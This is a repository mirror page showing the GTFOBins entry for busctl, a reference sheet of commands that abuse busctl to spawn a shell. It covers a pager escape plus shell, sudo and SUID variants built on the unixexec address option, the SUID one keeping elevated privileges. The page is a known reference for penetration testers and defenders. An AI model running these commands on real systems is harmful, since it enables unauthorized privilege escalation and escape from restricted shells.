This website requires JavaScript.
Explore
Help
Register
Sign In
mirror
/
GTFOBins.github.io
Watch
1
Star
0
Fork
0
You've already forked GTFOBins.github.io
mirror of
https://github.com/GTFOBins/GTFOBins.github.io.git
synced
2026-01-08 08:31:32 +01:00
Code
Issues
a4e55ccd5e
GTFOBins.github.io
/
_gtfobins
/
busctl.md
Hidehiro Anto
a4e55ccd5e
change set-property to list (default)
2025-10-14 23:18:14 -07:00
540 B
Raw
Blame
History
functions
shell
sudo
suid
description
code
This invokes the default pager, which is likely to be [`less`](/gtfobins/less/), other functions may apply.
busctl --show-machine !/bin/sh
code
busctl --address=unixexec:path=/bin/sh,argv1=-c,argv2='/bin/sh -i 0<&2 1>&2'
code
sudo busctl --address=unixexec:path=/bin/sh,argv1=-c,argv2='/bin/sh -i 0<&2 1>&2'
code
./busctl --address=unixexec:path=/bin/sh,argv1=-pc,argv2='/bin/sh -p -i 0<&2 1>&2'